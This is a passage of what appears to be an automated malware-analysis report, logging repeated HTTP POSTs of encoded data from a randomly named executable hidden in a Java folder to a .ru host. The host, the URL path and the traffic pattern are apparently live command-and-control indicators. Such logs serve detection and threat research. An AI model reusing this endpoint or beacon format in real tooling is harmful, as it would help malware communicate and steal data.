                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2BSrIcm9Lcf6deAzTKg51b4AvPYoZR4a8i2jBkugjX%2FfJwa63wl%2Fh6aoo9dMQT%2Bkrr%2BTZQMorcr5xTWlGYvXrrr3iMchURpmu8h6Kw1u%2B0xFkMQg7Zjp1b9IuwdQtDHcJwyDfusi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30db15ef5728c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5068&min_rtt=2051&rtt_var=6805&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=55737&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  116 | 192.168.2.4 | 50104 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:34.470624924 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:34.821993113 CET | 1072 | OUT | Data Raw: 55 5f 5d 51 5f 5a 51 5b 55 5a 54 59 51 52 55 5c 58 5d 5c 58 59 56 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_]Q_ZQ[UZTYQRU\X]\XYVR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \?"4;%_&.9]>>7Y09'8$/!3/?-.;((*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:34.913135052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:35.175642967 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyofnkBEPySElP2khCJBoUWjk4Be4k3Q%2F899CDsGlE5Py2U4QrQUOVGDJlueJJk7Hz3wwgBt1uAGmVokijd8YrWM2HmmQ2CSR0TpuyfACvqJZteB0V%2F0tJv7oq%2BGR643YxP%2B1QQt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30db6e8170f5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1492&rtt_var=708&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=699233&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  117 | 192.168.2.4 | 50111 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:35.309551001 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:35.665648937 CET | 1072 | OUT | Data Raw: 50 54 58 5d 5f 5b 51 59 55 5a 54 59 51 52 55 51 58 5d 5c 58 59 5c 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PTX]_[QYUZTYQRUQX]\XY\RS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(=#=2X&==?0B.Q-$Y3<20Z3X//(><=<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:35.783241987 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:36.046303034 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FdIIHQMqKaxseswvXXVjKFX5t4IuMRZhA0%2BxZsTZ3OQS4KApgiN%2F1Fy4r%2BEiMnxatUS0xN0CS3diXg6eOXCwZrKgfHEdlI0gdI5PHgbJZ1gihiQR69bGfitjpsvFY284fh6%2FT76"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dbc5bd4c34b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3582&min_rtt=1564&rtt_var=4622&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=82443&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:36.133307934 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  118 | 192.168.2.4 | 50120 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:36.270596027 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:36.618868113 CET | 1072 | OUT | Data Raw: 55 57 58 55 5f 5b 54 58 55 5a 54 59 51 59 55 5c 58 58 5c 5b 59 54 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXU_[TXUZTYQYU\XX\[YTR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+?1#=%>*=7_'!-440?1'?#^/X(<=<R>#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:36.714202881 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:36.873956919 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FONIoogswPRyJOtEq6Ic0Vo5xjr%2Fnjz2kz0Nit2lxNRYsaNAbJTtOCzXyvBTxWBsJyxiYHELUU%2BhnD1yIgUb6NOFUtNatbPXbzPRBmlD3meJnHVAI1I61jPyFV5u1d5WnEWStXda"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dc22bb6de97-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4349&min_rtt=1499&rtt_var=6263&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=60072&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:36.960817099 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 50126 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:37.368474960 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.4 | 50127 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:37.562930107 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:37.916093111 CET | 1796 | OUT | Data Raw: 50 53 5d 51 5f 59 51 59 55 5a 54 59 51 52 55 5d 58 5a 5c 54 59 50 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]Q_YQYUZTYQRU]XZ\TYPR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?!+&21X>3[0':-<$/)3,/X;+>$>#^!'^)
Jan 1, 2025 15:03:38.016895056 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:38.277766943 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9MgWSFy51Z322sbFsWyaK9VUVkwY8wjoqTkBbb0QMcG6AnreFVP47JMmxdLZUm8cCJdawGo77P2GiyrAZSW0yRFnHCgj8dojIU9Exqc3A3fwA3UpKloAtWFQeMYJOHP9cQ%2F6c9W"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dca4cc80fa4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3968&min_rtt=1566&rtt_var=5392&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=70239&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 12 27 02 27 1b 2b 00 22 5a 2f 2f 05 54 31 3f 2a 5f 24 09 2c 5b 25 3e 13 5f 2e 06 2c 1e 2b 38 2b 5a 24 2a 2d 11 20 08 21 03 25 0c 2e 5d 04 1d 25 5a 3f 3a 32 59 3c 11 07 13 3d 31 30 16 24 09 2f 5d 25 27 3b 00 27 2d 26 1f 21 22 2b 10 30 20 2c 54 3f 2a 30 06 30 13 39 0c 23 3a 2e 57 0d 12 21 0c 25 00 1c 0d 2a 21 2b 0f 22 12 28 0a 27 2f 0a 09 24 02 3f 0e 37 3b 3e 54 29 3f 0d 04 21 09 3a 0d 30 2a 09 58 35 07 29 11 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"''+"Z//T1?*_$,[%>_.,+8+Z$*- !%.]%Z?:2Y<=10$/]%';'-&!"+0 ,T?*009#:.W!%*!+"('/$?7;>T)?!:0*X5)6"T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.4 | 50128 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:37.716358900 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:38.072092056 CET | 1064 | OUT | Data Raw: 55 56 58 55 5f 59 51 5a 55 5a 54 59 51 5b 55 57 58 52 5c 55 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXU_YQZUZTYQ[UWXR\UYQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?" &."*/3.P.$$0*U$Z3^,?+>$V=,#^!'^)/
Jan 1, 2025 15:03:38.161473989 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:38.429141045 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrJfNEyRg04AkIAjyqA%2FSWNWIPEt%2FXhkVp85XRUNWi1fKPQsLaXZBmTrdT5ZFpWBlMNfrzDbzDIBcVlpjM8EmhbNHIlnKMwgHVlzyETNZi18P3DOWTkks8bwg8O0TDF76QVlXQCU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dcb3c044325-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2199&min_rtt=1739&rtt_var=1574&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=269074&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.4 | 50129 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:38.561950922 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:03:38.915797949 CET | 1072 | OUT | Data Raw: 55 55 5d 51 5a 5e 54 59 55 5a 54 59 51 52 55 57 58 58 5c 5e 59 52 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]QZ^TYUZTYQRUWXX\^YRRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _)/)] :$>2>('4:T-$\3?U$?8->?;>#^!'^)
Jan 1, 2025 15:03:39.007306099 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:39.181797028 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYPz36BahP1%2BVkOKvRjqwYJGKsvLbl5M%2F7PHd4KTBZMB5w7Vc7zIHt9d2EKa8GU77A%2FCSprfnC7Cp6rZGkuzgo39Hw05QDvkIOYsYK5N85HxHCbUhKupA6F6M0BH58Cw%2BJ%2BOeQOw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dd08d2a1a17-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2122&min_rtt=2001&rtt_var=994&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=490756&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.4 | 50130 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:39.309048891 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:39.670267105 CET | 1072 | OUT | Data Raw: 55 55 58 51 5a 5d 51 55 55 5a 54 59 51 58 55 53 58 5e 5c 59 59 54 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXQZ]QUUZTYQXUSX^\YYTRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#</. ;$-5[)4&$2:''36T'3_-=$[<-$T(,#^!'^)+
Jan 1, 2025 15:03:39.755247116 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:39.931443930 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFi%2Btdd3rTwsb6zv8ZwoopLHu%2B04KYnHbhm9sSUdOchgaVmLOvRB72fembr7hWrQy0lLgSpnVr1p5QtQDYo3%2FB82nzRulT5LQ1OD65EHv6aWkUnYM9Em5bbaMaPbI5iSE8PWJ2cv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dd52ada0cc4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2608&min_rtt=1748&rtt_var=2376&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=169177&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.4 | 50131 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:40.057506084 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:40.415766001 CET | 1072 | OUT | Data Raw: 55 51 58 5d 5f 5e 51 5b 55 5a 54 59 51 53 55 55 58 59 5c 5a 59 53 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQX]_^Q[UZTYQSUUXY\ZYSRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?<)[#>$.=Z(>037:U,$$_'$<,,<#>#^!'^)
Jan 1, 2025 15:03:40.511219025 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:40.778501034 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojxLXi3gMDI580nKzTTtw%2F8OOqVUuzDHLPOnfzSIsSTb7P0bwQhMVRTJlBo4%2BV6NDVGWXYYCeDY9M2WHky5XWg1N9HWAmNTDiH%2BCI98Ep9f3CImXEo096mBUvI9uXN42Oll2cIEi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dd9eec04213-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4820&min_rtt=1726&rtt_var=6837&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=55125&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
